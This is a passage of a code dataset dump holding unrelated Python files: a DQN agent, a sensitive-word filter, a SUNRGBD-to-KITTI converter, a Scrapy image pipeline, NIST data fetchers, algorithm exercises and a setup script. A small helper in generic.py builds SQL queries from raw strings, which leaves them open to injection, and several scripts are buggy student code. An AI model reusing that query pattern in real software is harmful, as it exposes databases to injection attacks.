flag to false\n        with torch.no_grad():\n            action_values = self.local_network(state)\n        action = self._choose_action(action_values, eps)\n\n        # set network back to learning mode\n        self.local_network.train()\n\n        return action\n\n    def _choose_action(self, action_values, eps):\n        # Epsilon-greedy action selection\n        if random.random() > eps:\n            # print(\"taking network action\")\n            return np.argmax(action_values.cpu().data.numpy())\n        else:\n            # print(\"taking random action\")\n            return random.choice(np.arange(self.action_size))\n\n    def _learn(self, experiences):\n        states, actions, rewards, next_states, dones = experiences\n\n        if self.double_dqn:\n            best_actions = self.local_network(next_states).detach().argmax(1).unsqueeze(1)\n            # get actual Q-value from the actions taken\n            Q_next_targets = self.target_network(next_states).detach().gather(1, best_actions)\n        else:\n            Q_next_targets = self.target_network(next_states).detach().max(1)[0].unsqueeze(1)\n\n        Q_targets = rewards + (self.GAMMA * Q_next_targets * (1-dones))\n        Q_actual = self.local_network(states).gather(1, actions)\n\n        # calculate the loss\n        loss = F.mse_loss(Q_actual, Q_targets)\n\n        # minimize loss\n        self.optimizer.zero_grad()\n        loss.backward()\n\n        # apply the gradients\n        self.optimizer.step()\n\n    def _commit_learning(self):\n        for target_param, local_param in zip(self.target_network.parameters(), self.local_network.parameters()):\n            if self.update_type == \"soft\":\n                target_param.data.copy_((1.0-self.TAU)*target_param.data + self.TAU*local_param.data)\n            if self.update_type == \"hard\":\n                target_param.data.copy_(local_param.data)\n","sub_path":"src/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":5084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"106485294","text":"# coding=utf-8\r\n# 3.31 homework - 敏感词2.py (sensitive-word filter)\r\n# 2019/4/3 12:28\r\ndef change():\r\n    b = input(\"Please enter a message: \")\r\n    for w in open('word.txt',encoding='utf-8'):\r\n        nw = w.rstrip()\r\n        if nw in b:\r\n            nw_len = len(nw)\r\n            b = b.replace(nw,'*'*nw_len)\r\n\r\n    print(b)\r\nchange()\r\n\r\nfrom sys import argv # accept arguments passed in on the command line\r\n# 1. First store the contents of the txt file in a list\r\n\r\n\r\ndef fun1():\r\n    words = [] # define an empty list here to hold the sensitive words\r\n    f = open('word.txt',encoding='utf-8') # open the file\r\n    for word in f: # iterate over the words in the file\r\n        words.append(word[:-1]) # append each sensitive word to the list\r\n    f.close()\r\n    return words # return the list words\r\n\r\n\r\n# 2. Check whether the input is contained in the list\r\ndef fun2(words, b):\r\n    \"\"\"\r\n\r\n    :param words: the list of sensitive words built above\r\n    :param b: the message entered by the user\r\n    :return:\r\n    \"\"\"\r\n    b = input(\"Please enter a message: \") # get the user input\r\n    for w in words:\r\n        if w == b: # check whether the user input is in the list\r\n            print(\"freedom\")\r\n            change()\r\n            print(\"Human Rights\")\r\n            return\r\nfun2(fun1(),input)\r\n","sub_path":"0331/3.31作业cc/敏感词2.py","file_name":"敏感词2.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"34270124","text":"from scipy import io\nfrom matplotlib import pyplot\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom numpy import matlib\nimport numpy as np\nimport cv2\nimport math\nimport sys\nimport os\n# np.set_printoptions(threshold=sys.maxsize)\n\ndef flip_towards_viewer(normals, points):\n    mat = np.matlib.repmat(np.sqrt(np.sum(points*points, 1)), 3, 1)\n    points = points / mat\n    # print(points)\n    proj = np.sum(points * normals, 1)\n    flip = proj > 0\n    normals[flip, :] = -normals[flip, :]\n    return normals\n\n\ndef make_kitti_calib (mat_file):\n    for range_index in range(4) :\n        data = mat_file.popitem()\n        if(data[0] == 
'SUNRGBDMeta'):\n            image_index = 31\n            # (1) to inspect the rgbpath\n            path = data[1][0][image_index][5][0]\n            print(path)\n            for i in range(10335):\n                # for j in range(13):\n                #\n                # \"\"\" data[1][0][image_index][index]\n                # 0. sequenceName (string)\n                # 1. groundtruth3DBB (9 element struct)\n                # 2. Rtilt (3x3 double)\n                # 3. K (3x3 double)\n                # 4. depthpath (string)\n                # 5. rgbpath (string)\n                # 6. anno_extrinsics (3x3 double)\n                # 7. depthname (string)\n                # 8. rgbname (string)\n                # 9. sensorType (string : kv1 / kv2 / realsense / xtion)\n                # 10. valid (all 1s)\n                # 11. gtCorner3D (3xN double, missing for some entries)\n                # 12. groundtruth2DBB (4 element struct)\n                # \"\"\"\n                #list = []\n                K = np.array(data[1][0][i][3])\n                new_K = np.zeros((K.shape[0],K.shape[1]+1))\n                new_K[:,:-1] = K # the (3,3) block is the original data\n\n\n                #list.extend(new_K.reshape(-1))\n                list = new_K.reshape(-1).tolist()\n                img_path = data[1][0][i][5]\n                f = open('../data/SUNRGBD/calib/'+str(img_path).split('/')[-1].split('.')[0]+'.txt', 'w')\n                f.write(str(list[:]))\n                #del list[:] # clear only the elements inside the list\n                list.clear()\n            depth_raw = cv2.imread(data[1][0][image_index][4][0], -1) # read the depth values (one image)\n            depthInpaint = (depth_raw>>3) | (depth_raw<<(16-3))\n            depthInpaint = depthInpaint.astype(\"float32\")\n            depthInpaint = depthInpaint / 1000\n            color_raw = cv2.imread(data[1][0][image_index][5][0], cv2.COLOR_RGB2BGR) # read the image values as a mat\n            rgb = np.reshape(color_raw, (len(color_raw) * len(color_raw[0]), 3))\n            rgb = rgb.astype(\"float32\")\n            rgb = rgb / 255\n            K = data[1][0][image_index][3]\n            cx = K[0][2]\n            cy = K[1][2]\n            fx = K[0][0]\n            fy = K[1][1]\n\n            range_x = np.arange(1, len(depth_raw[0])+1)\n            range_y = np.arange(1, len(depth_raw)+1)\n\n            x, y = np.meshgrid(range_x, range_y)\n\n            x3 = (x-cx)*depthInpaint*1/fx\n            y3 = (y-cy)*depthInpaint*1/fy\n            z3 = depthInpaint\n\n            x3 = np.reshape(x3, len(x3)*len(x3[0]))\n            y3 = np.reshape(y3, len(y3)*len(y3[0]))\n            z3 = np.reshape(z3, len(z3)*len(z3[0]))\n            #pointsMat = np.vstack((x3,-y3,z3))\n            pointsMat = np.vstack((x3,z3,-y3))\n            # # remove nan\n            nan_index = []\n            for i in range(len(x3)):\n                # if x3[i] != 0 or y3[i] != 0 or z3[i] != 0:\n                if x3[i] == 0 and y3[i] == 0 and z3[i] == 0:\n                    nan_index.append(i)\n                    pass\n                pass\n            pointsMat = np.delete(pointsMat, nan_index, axis=1)\n            rgb = np.delete(rgb, nan_index, axis=0)\n            Rtilt = data[1][0][image_index][2]\n            point3d = Rtilt @ pointsMat\n            \"\"\"\n            Random sampling.\n            260631 --> 10000.\n            \"\"\"\n            sample_size = np.random.randint(len(point3d[0]), size=10000)\n            x3 = point3d[0, sample_size]\n            y3 = point3d[2, sample_size]\n            z3 = point3d[1, sample_size]\n            rgb = rgb[sample_size, :]\n            \"\"\"\n            Visualize\n            \"\"\"\n            label_lists = []\n            for groundtruth3DBB in data[1][0][image_index][1]:\n                # the loop runs once for each object contained in the image\n                for items in groundtruth3DBB:\n                    #label_list = []\n\n                    \"\"\"\n                    items = data[1][0][image_index][1][(groundtruth3DBB)]\n                    items[index]\n                    0. basis (3x3 double)\n                    1. coeffs (1x3 double)\n                    2. centroid (1x3 double)\n                    3. classname (string) #label_name\n                    4. labelname (?)\n                    5. sequenceName (string)\n                    6. orientation (1x3 double)\n                    7. gtBb2D (1x4 double)\n                    8. 
label ()\n                    \"\"\"\n\n                    corners = np.zeros((8,3))\n                    basis_ori = items[0]\n\n                    label = items[3][0]\n                    print(\"label : \" , label)\n                    inds = np.argsort(-abs(items[0][:, 0]))\n\n                    basis = items[0][inds, :]\n                    coeffs = items[1][0, inds]\n\n                    inds = np.argsort(-abs(basis[1:, 1]))\n\n                    centroid = items[2]\n                    basis = flip_towards_viewer(basis, np.matlib.repmat(centroid, 3, 1))\n                    coeffs = abs(coeffs)\n\n                    orientation = items[6][0]\n\n                    corners[0, :] = -basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]\n                    corners[1, :] = basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]\n                    corners[2, :] = basis[0, :] * coeffs[0] - basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]\n                    corners[3, :] = -basis[0, :] * coeffs[0] - basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]\n\n\n                    corners[4, :] = -basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] - basis[2, :] * coeffs[2]\n                    corners[5, :] = basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] - basis[2, :] * coeffs[2]\n                    corners[6, :] = basis[0, :] * coeffs[0] - basis[1, :] * coeffs[1] - basis[2, :] * coeffs[2]\n                    corners[7, :] = -basis[0, :] * coeffs[0] - basis[1, :] * coeffs[1] - basis[2, :] * coeffs[2]\n\n                    corners += np.matlib.repmat(centroid, 8, 1)\n                    # theta in radians.\n                    theta = math.atan2(orientation[1], orientation[0])\n                    theta_s = str(theta*180.0/math.pi)[:6]\n                    # theta in degrees\n                    dtheta = math.degrees(theta)\n                    # x coordinate: length, y coordinate: width, z coordinate: height\n                    label_length = corners[1, 0] - corners[0, 0]\n                    label_width = corners[0, 1] - corners[1, 1]\n                    label_height = corners[4, 2] - corners[0, 2]\n                    # label_center_x = sum(corners[1, 0], corners[0, 0]) / 2\n                    # label_center_y = sum(corners[1, 1], corners[0, 1]) / 2\n                    # label_center_z = sum(corners[3, 3], corners[0, 0]) / 2\n                    label_center_x = corners[0, 0] + label_length / 2\n                    label_center_y = corners[0, 1] - label_width / 2\n                    label_center_z = corners[0, 2] - label_height / 2\n\n                    label_list = [label, label_center_x, label_center_y, label_center_z, label_length, label_width, label_height, theta]\n                    label_lists.append(label_list[:])\n                    label_list.clear()\n                    ax.plot([corners[0, 0], corners[1, 0]], [corners[0, 1], corners[1, 1]],\n                            zs=[corners[0, 2], corners[1, 2]], c='r')\n                    ax.plot([corners[1, 0], corners[2, 0]], [corners[1, 1], corners[2, 1]],\n                            zs=[corners[1, 2], corners[2, 2]], c='r')\n                    ax.plot([corners[2, 0], corners[3, 0]], [corners[2, 1], corners[3, 1]],\n                            zs=[corners[2, 2], corners[3, 2]], c='r')\n                    pyplot.show()\n                    ax.plot([corners[3, 0], corners[0, 0]], [corners[3, 1], corners[0, 1]],\n                            zs=[corners[3, 2], corners[0, 2]], c='r')\n                    pyplot.show()\n                    ax.plot([corners[4, 0], corners[5, 0]], [corners[4, 1], corners[5, 1]],\n                            zs=[corners[4, 2], corners[5, 2]], c='r')\n                    ax.plot([corners[5, 0], corners[6, 0]], [corners[5, 1], corners[6, 1]],\n                            zs=[corners[5, 2], corners[6, 2]], c='r')\n                    ax.plot([corners[6, 0], corners[7, 0]], [corners[6, 1], corners[7, 1]],\n                            zs=[corners[6, 2], corners[7, 2]], c='r')\n                    ax.plot([corners[7, 0], corners[4, 0]], [corners[7, 1], corners[4, 1]],\n                            zs=[corners[7, 2], corners[4, 2]], c='r')\n\n                    ax.plot([corners[0, 0], corners[4, 0]], [corners[0, 1], corners[4, 1]],\n                            zs=[corners[0, 2], corners[4, 2]], c='r')\n                    ax.plot([corners[1, 0], corners[5, 0]], [corners[1, 1], corners[5, 1]],\n                            zs=[corners[1, 2], corners[5, 2]], c='r')\n                    ax.plot([corners[2, 0], corners[6, 0]], [corners[2, 1], corners[6, 1]],\n                            zs=[corners[2, 2], corners[6, 2]], c='r')\n                    ax.plot([corners[3, 0], corners[7, 0]], [corners[3, 1], corners[7, 1]],\n                            zs=[corners[3, 2], corners[7, 2]], c='r')\n\n                    ax.text3D(corners[0,0], 
corners[0,1], corners[0,2], label, fontsize=10)\n                    # ax.text3D(corners[0,0], corners[0,1], corners[0,2], label+\" / \"+theta_s, fontsize=10, color='blue')\n                    pass\n                #label_img_path = data[1][0][i][5]\n                #print(label_img_path)\n                fp = open('../data/SUNRGBD/label/' + str(img_path).split('/')[-1].split('.')[0] + '.txt', 'w')\n                for j in range(len(label_lists)):\n                    fp.write(str(label_lists[j]) + '\\n')\n                fp.close()\n                label_lists.clear()\n                pass\n\n            bgr = np.zeros((len(rgb),3))\n            bgr[:,0] = rgb[:,2]\n            bgr[:,1] = rgb[:,1]\n            bgr[:,2] = rgb[:,0]\n            ax.scatter(x3, z3, y3, c=bgr, depthshade=False)\n            pyplot.show()\n\n        else:\n            continue\n        pass\n        # (2) convert depth to meters\n\n        \"\"\"\n        data[1][0][index] --> the index-th data. ( 0 <= index <= 10335 )\n        data[1][0][index][index2] --> the index2-th field of the index-th data. Corresponds to a column in Matlab. 13 fields.\n        \"\"\"\n        # here the calib files are written using the image name.\n\n\n\n        # #color_raw = (530, 730, 3)\n        # color_raw = cv2.imread(data[1][0][image_index][5][0], cv2.COLOR_RGB2BGR) # read the image values as a mat\n        # #depth_raw = (530, 730)\n        #\n        # depth_raw = cv2.imread(data[1][0][image_index][4][0], -1) # read the depth values (one image)\n        #\n        # #\n        # # \"\"\"\n        # # uint8 color_raw data to float32 range(0,1)\n        # # \"\"\"\n        # #\n        # '''\n        # probably not needed\n        # rgb = np.reshape(color_raw, (len(color_raw)*len(color_raw[0]), 3))\n        # rgb = rgb.astype(\"float32\")\n        # rgb = rgb / 255\n        # '''\n        # #\n        # #\n        # # \"\"\"\n        # # Make 3d point cloud by using depth_raw\n        # # \"\"\"\n        # # convert depth to meters\n        # # depthInpaint = (530, 730)\n        # depthInpaint = (depth_raw>>3) | (depth_raw<<(16-3))\n        # depthInpaint = depthInpaint.astype(\"float32\")\n        # depthInpaint = depthInpaint / 1000\n        # # ignore values above 8 m\n        # # for row in depthInpaint :\n        # #     for ele in row :\n        # #         ele = 8 if ele > 8 else ele\n        # #         pass\n        # #     pass\n        # # these are the camera parameters\n        # K = data[1][0][image_index][3]\n        # cx = K[0][2]\n        # cy = K[1][2]\n        # fx = K[0][0]\n        # fy = K[1][1]\n        #\n        # range_x = np.arange(1, len(depth_raw[0])+1)\n        # range_y = np.arange(1, len(depth_raw)+1)\n        #\n        # x, y = np.meshgrid(range_x, range_y)\n        #\n        # x3 = (x-cx)*depthInpaint*1/fx\n        # y3 = (y-cy)*depthInpaint*1/fy\n        # z3 = depthInpaint\n        #\n        # x3 = np.reshape(x3, len(x3)*len(x3[0]))\n        # y3 = np.reshape(y3, len(y3)*len(y3[0]))\n        # z3 = np.reshape(z3, len(z3)*len(z3[0]))\n        # #pointsMat = np.vstack((x3,-y3,z3))\n        # pointsMat = np.vstack((x3,z3,-y3))\n        # # to draw the point cloud (start)\n        # # # remove nan\n        # nan_index = []\n        # for i in range(len(x3)):\n        #     # if x3[i] != 0 or y3[i] != 0 or z3[i] != 0:\n        #     if x3[i] == 0 and y3[i] == 0 and z3[i] == 0:\n        #         nan_index.append(i)\n        #         pass\n        #     pass\n        # pointsMat = np.delete(pointsMat, nan_index, axis=1)\n        # rgb = np.delete(rgb, nan_index, axis=0)\n        #\n        # Rtilt = data[1][0][image_index][2]\n        # point3d = Rtilt @ pointsMat\n        #\n        # \"\"\"\n        # Random sampling.\n        # 260631 --> 10000.\n        # \"\"\"\n        # sample_size = np.random.randint(len(point3d[0]), size=10000)\n        # x3 = point3d[0, sample_size]\n        # y3 = point3d[2, sample_size]\n        # z3 = point3d[1, sample_size]\n        # rgb = rgb[sample_size, :]\n        #\n\n\nif __name__ == '__main__':\n    fig = pyplot.figure()\n    ax = Axes3D(fig)\n\n    mat_file = io.loadmat('C:/SUNRGBDMeta/SUNRGBDMeta.mat')\n    make_kitti_calib(mat_file)\n","sub_path":"CenterNet-master/SUN_to_KITTI/ReadMAT_WriteFileForKitti.py","file_name":"ReadMAT_WriteFileForKitti.py","file_ext":"py","file_size_in_byte":14917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"249216941","text":"# -*- coding: utf-8 -*-\r\n\r\n# Define your item pipelines here\r\n#\r\n# Don't forget to add your 
pipeline to the ITEM_PIPELINES setting\r\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\r\n\r\nfrom urllib import request\r\nimport time\r\nclass QiushispidersPipeline(object):\r\n    def process_item(self, item, spider):\r\n        src = item[\"src\"]\r\n\r\n        url = \"http:\"+ src\r\n        print(url)\r\n        path = \"D:\\\\img\\\\\"+str(time.time())+\".jpg\"\r\n        try:\r\n            request.urlretrieve(url,path)\r\n        except Exception as e:\r\n            print(e)\r\n        else:\r\n            print(\"Crawling, please wait\")\r\n\r\n\r\n        return item\r\n","sub_path":"学神1809/qiushispiders/qiushispiders/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"642276863","text":"#!/usr/bin/env python\n\nfrom I3Tray import *\n\ntray = I3Tray()\n\n\ntray.AddModule(\"BottomlessSource\")\n\n# can't convert that return value to bool or none\ndef f(frame, foo='foo', bar='bar', baz='baz'):\n    print(foo, bar, baz)\n    assert foo == 'foo', 'foo didnt get set'\n    assert bar == 'BARWASSET', 'bar didnt get set'\n    assert baz == 'baz', 'baz didnt get set'\n    return True\n\ntry:\n    tray.AddModule(f,\"keywordfn\",\n                   bar = 'BARWASSET',\n                   argdoesntexist = 'oopsie')\n    print(\"That should have thrown\")\n    sys.exit(1)\n\nexcept RuntimeError as e:\n    print(e)\n    print(\"OK, threw as expected\")\n\n    \n\n    \n\n","sub_path":"icetray/resources/test/unknown_keywd_argument.py","file_name":"unknown_keywd_argument.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"38747310","text":"import csv\nimport io\nimport urllib\nimport urllib.request\n\n\ndef fetch_states(atom):\n    url = \"https://physics.nist.gov/cgi-bin/ASD/energy1.pl\"\n    values = {\n        \"spectrum\": atom,\n        \"units\": 2,  # energy units {0: cm^-1, 1: eV, 2: Ry}\n        \"format\": 3,  # format {0: HTML, 1: ASCII, 2: CSV, 3: TSV}\n        \"multiplet_ordered\": 1,  # energy ordered\n        \"term_out\": \"on\",  # output the term symbol string\n        \"conf_out\": \"on\",  # output the configuration string\n        \"level_out\": \"on\",  # output the energy level\n        \"unc_out\": 0,  # uncertainty on energy\n        \"j_out\": \"on\",  # output the J level\n        \"g_out\": \"on\",  # output the g-factor\n        \"lande_out\": \"off\",  # output experimentally measured g-factor\n    }\n\n    get_postfix = urllib.parse.urlencode(values)\n    with urllib.request.urlopen(url + \"?\" + get_postfix) as response:\n        response = response.read()\n\n    data = csv.DictReader(\n        io.StringIO(response.decode()), dialect=\"excel-tab\", restkey=\"None\"\n    )\n\n    return data\n\n\ndef fetch_transitions(atom):\n    # the NIST url and GET options.\n    url = \"http://physics.nist.gov/cgi-bin/ASD/lines1.pl\"\n    values = {\n        \"spectra\": atom,\n        \"format\": 3,  # format {0: HTML, 1: ASCII, 2: CSV, 3: TSV}\n        \"en_unit\": 2,  # energy units {0: cm^-1, 1: eV, 2: Ry}\n        \"line_out\": 2,  # only with {1: transition , 2: level classifications}\n        \"show_av\": 5,\n        \"allowed_out\": 1,\n        \"forbid_out\": 1,\n        \"enrg_out\": \"on\",\n    }\n\n    get_postfix = urllib.parse.urlencode(values)\n    with urllib.request.urlopen(url + \"?\" + get_postfix) as response:\n        # when there are no transitions ASD returns a text/html page with the\n        # error message \"No lines are available in ASD with the parameters selected\"\n        # rather than the expected text/plain when using format=3\n        if response.headers.get_content_type() != \"text/plain\":\n            print(response.headers.get_content_type())\n            return []\n\n        response = response.read()\n\n    data = 
csv.DictReader(io.StringIO(response.decode()), dialect=\"excel-tab\")\n data_with_transition_probabilities = [\n transition for transition in data if transition[\"Aki(s^-1)\"]\n ]\n\n return data_with_transition_probabilities\n","sub_path":"atomphys/data/nist.py","file_name":"nist.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"473288116","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Oct 30 2018\nTo run the codes in server, to use time python3 ....py\n\nThis code is for contatenate results by R scripts\n\n% previous:\nThis code use parallelling to run DP which cannot be conducted for a long sequence; results are stored in multiple\ntxts, and then the code later combines the txts into a single txt file.\n\n@author: hangwei\n\"\"\"\nimport os\nimport numpy as np\nimport scipy.io\n\nimport_data = scipy.io.loadmat('unordered_frame.mat')\nseries_data_full = import_data['unordered_frame']\nimport_bkps = scipy.io.loadmat('bkps_true.mat')\nbkps_true_full = import_bkps['bkps_true']\n\nresults_folder = './seg_results/'\nif not os.path.exists(results_folder):\n os.makedirs(results_folder)\n \nnow_ind = 1\n\nnumber_ind = np.shape(series_data_full)[0] # 99568 # full: 99568\nn_parallel_chunk = 5000\n\nseries_data = series_data_full[1:(number_ind+1), :]\nbkps_true = bkps_true_full[bkps_true_full < number_ind]\nbkps_true = np.append(bkps_true, (number_ind - 1)) # the last segment is the end of data\nn_bkps = len(bkps_true) - 1\n\nnow_methods = ['e_divisive', 'e_cp3o_delta', 'ks_cp3o_delta']\ndef combine_txts():\n results_list = []\n if number_ind > n_parallel_chunk: \n number_chunks = int((number_ind-number_ind % n_parallel_chunk)/n_parallel_chunk + 1)\n for now_file_ind in range(1, number_chunks+1):\n now_file_name = now_method+'_'+str(number_ind)+'_'+str(now_file_ind)+'.txt'\n print(now_file_name)\n now_data = np.loadtxt(results_folder+now_file_name, dtype='int')\n if now_file_ind < number_chunks-1: # need to remove the last ind\n # results_list.append(now_data[0:now_data.shape[0]-1], axis = 0)\n results_list = np.concatenate((results_list, now_data[0:now_data.shape[0]-1]), axis = 0)\n print(now_data[0:now_data.shape[0]-1])\n else: # keep all the data\n results_list = np.concatenate((results_list, now_data), axis = 0)\n print(now_data)\n print(results_list)\n np.savetxt(results_folder + now_method + '_'+ str(number_ind)+'.txt', results_list, fmt='%d')\n np.savetxt(results_folder + now_method + '_'+ str(number_ind)+'.txt', results_list, fmt='%d')\n\nfor now_method in now_methods:\n combine_txts()\n\n\n\n\n\n","sub_path":"code/skoda/2_combine_results_for_parallel.py","file_name":"2_combine_results_for_parallel.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"470903921","text":"from . 
import conn\n\n\ndef get_all_where(tablename, clause):\n    cur = conn.cursor()\n    cur.execute(\"SELECT * FROM {0} WHERE {1}\".format(tablename, clause))\n    return cur\n\n\ndef get_all(tablename):\n    cur = conn.cursor()\n    cur.execute(\"SELECT * FROM {0}\".format(tablename))\n    rows = cur.fetchall()\n\n    return rows","sub_path":"app/models/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"513976134","text":"#!/usr/bin/python3\n\"\"\"Module to add new attribute to an object if possible\"\"\"\n\n\ndef add_attribute(self, name, value):\n    \"\"\"Add attribute to object if possible\n    Args:\n        name: name of attribute\n        value: value of attribute\n    \"\"\"\n    if hasattr(self, \"__dict__\"):\n        setattr(self, name, value)\n    else:\n        raise TypeError(\"can't add new attribute\")\n","sub_path":"0x0A-python-inheritance/101-add_attribute.py","file_name":"101-add_attribute.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"129454644","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Dec  4 20:16:55 2019\r\n\r\n@author: gunjan\r\n\"\"\"\r\n#2-pointer approach works only for sorted array\r\n#input=[-1,0,1,2,-1,-4]\r\n#Expected output = [[-1, -1, 2], [-1, 0, 1]]\r\n\r\n###Two pointer approach\r\n\r\ndef solution(input):\r\n\r\n    nums=sorted(input) #sorted array [-4,-1,-1,0,1,2]\r\n    \r\n    if(nums==[] or len(nums)<3):\r\n        return 0\r\n    \r\n    answer=[]\r\n    for i in range(len(nums)-2):\r\n        #print nums[i]\r\n        \r\n        if((nums[i]==nums[i-1]) and i>0): # if 2 consecutive nos are same, same result will come-removes duplicates\r\n            continue\r\n        \r\n        if(nums[i]>0): # if we reach a no greater than target - we can break the loop-wont find any more combinations\r\n            break\r\n        pt1=i+1 #low pointer\r\n        pt2=len(nums)-1 #high pointer\r\n        \r\n        while(pt1<pt2):\r\n            if((nums[i]+nums[pt1]+nums[pt2])<0): # sum<0 - increase left pointer\r\n                pt1+=1\r\n            \r\n            elif((nums[i]+nums[pt1]+nums[pt2])>0): # sum>0 - decrease right pointer\r\n                pt2-=1\r\n            \r\n            elif((nums[i]+nums[pt1]+nums[pt2])==0): # sum=0 - inc left and right pointer by 1\r\n                answer.append([nums[i],nums[pt1],nums[pt2]])\r\n                pt1+=1\r\n                pt2-=1\r\n        \r\n    return answer\r\n\r\nsolution([-1,0,1,2,-1,-4])\r\n\r\n#Time Complexity=O(n^2) - for loop and while loop\r\n#Space Complexity=O(1)\r\n\r\n\r\n#other checks for duplicates\r\n#1. set(solution) #to remove duplicates\r\n#2. 
-1 in input \r\n\r\n\r\n#Brute force approach \r\n\r\ndef solution2(nums):\r\n    if(nums==[] or len(nums)<3):\r\n        return 0\r\n    \r\n    answer2=[]\r\n    for i in range(len(nums)-2):\r\n        for j in range(i+1,len(nums)-1):\r\n            for k in range(j+1,len(nums)):\r\n                sum=nums[i]+nums[j]+nums[k]\r\n                if(sum==0):\r\n                    x=sorted([nums[i],nums[j],nums[k]])\r\n                    if x not in answer2:\r\n                        answer2.append(x)\r\n    return answer2\r\nsolution2([-1,0,1,2,-1,-4])\r\n\r\n#Time Complexity=O(n^3) - three nested for loops\r\n#Space Complexity=O(n^3)\r\n\r\n\r\n","sub_path":"Problem#34.py","file_name":"Problem#34.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"654245264","text":"from distutils.core import setup\n\nfrom setuptools import find_packages\n\n\ndef get_requirements():\n    # https://stackoverflow.com/questions/32688688/how-to-write-setup-py-to-include-a-git-repo-as-a-dependency\n    with open('requirements.txt') as r:\n        requirements = r.read().splitlines()\n    required = []\n\n    # do not add to required lines pointing to git repositories\n    egg_mark = '#egg='\n    for line in requirements:\n        if line.startswith('-e git:') or line.startswith('-e git+') or \\\n                line.startswith('git:') or line.startswith('git+'):\n            if egg_mark in line:\n                package_name = line[line.find(egg_mark) + len(egg_mark):]\n                required.append(package_name + ' @ ' + line)\n                # imagededup @ git+ssh://git@github.com/philipperemy/imagededup.git@master#egg=imagededup\n            else:\n                print('Dependency to a git repository should have the format:')\n                print('git+ssh://git@github.com/xxxxx/xxxxxx#egg=package_name')\n                exit(1)\n        else:\n            required.append(line)\n    return required\n\n\nsetup(\n    name='craft_pytorch',\n    version='1.0-skysense',\n    packages=find_packages(),\n    install_requires=get_requirements(),\n    include_package_data=True,\n    data_files=[\n        ('craft_ic15_20k.pth', ['craft/craft_ic15_20k.pth']),\n        ('craft_mlt_25k.pth', ['craft/craft_mlt_25k.pth']),\n        ('craft_refiner_CTW1500.pth', ['craft/craft_refiner_CTW1500.pth'])\n    ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"17157832","text":"def quickhull(listPts):\r\n    \"\"\"Returns the convex hull vertices computed using the\r\n    Quickhull algorithm as a list of m tuples\r\n    [(u0,v0), (u1,v1), ...]\r\n    \"\"\"\r\n    #Finding the minimum and maximum x points\r\n    min_x = (float('inf'), 0)\r\n    max_x = (0, 0)\r\n    for point in listPts:\r\n        if point[0] < min_x[0]: min_x = point\r\n        if point[0] > max_x[0]: max_x = point\r\n    #Calculating the convex hull using the quickhull_helper function\r\n    chull = quickhull_helper(listPts, min_x, max_x)\r\n    chull += quickhull_helper(listPts, max_x, min_x)\r\n    #Returning the convex hull\r\n    return chull\r\n\r\ndef quickhull_helper(listPts, min_x, max_x):\r\n    \"\"\"\r\n    Helper function for the quickhull algorithm,\r\n    which performs the bulk of the algorithm and returns\r\n    semi complete convex hulls\r\n    \"\"\"\r\n    #Getting all the points to the left of the line formed by the minimum and maximum x points\r\n    left_points = [point for point in listPts if is_counter(min_x, max_x, point)]\r\n    #Getting the farthest left point\r\n    far_point = farest_point(min_x, max_x, left_points)\r\n    #Checking if there are no points to the left\r\n    if far_point == (-1, -1): return [max_x]\r\n    #Recursively getting the points of the convex hull\r\n    hullPts = quickhull_helper(left_points, min_x, 
far_point)\r\n    hullPts = hullPts + quickhull_helper(left_points, far_point, max_x)\r\n    #Returning the hull points from the passed set of points\r\n    return hullPts\r\n\r\ndef farest_point(A, B, listPts):\r\n    \"\"\"\r\n    Returns the point from a passed list which is\r\n    the farthest from the passed line AB\r\n    \"\"\"\r\n    #Setting up the minimum and maximum x points\r\n    max_point = (-1, -1)\r\n    max_distance = 0\r\n    #Looping over all points\r\n    for point in listPts:\r\n        #Checking the current point isnt one of the bounding points\r\n        if point not in [A, B]:\r\n            #Calculating the distance from the bounding line to the point\r\n            temp = abs((B[1] - A[1]) * point[0] - (B[0] - A[0]) * point[1] + B[0] * A[1] - B[1] * A[0])\r\n            distance = (temp) / (((B[1] - A[1])**2 + (B[0] - A[0]) ** 2) ** 0.5)\r\n            #Checking if the current point is further away than the current furthest point\r\n            if distance > max_distance:\r\n                max_distance = distance\r\n                max_point = point\r\n    #Returning the furthest point\r\n    return max_point\r\n\r\n\r\n\r\ndef is_counter(A, B, Y):\r\n    \"\"\"Returns boolean flag holding if the turn\r\n    of the three points passed is counter clockwise\r\n    \"\"\"\r\n    #Using the line function to check 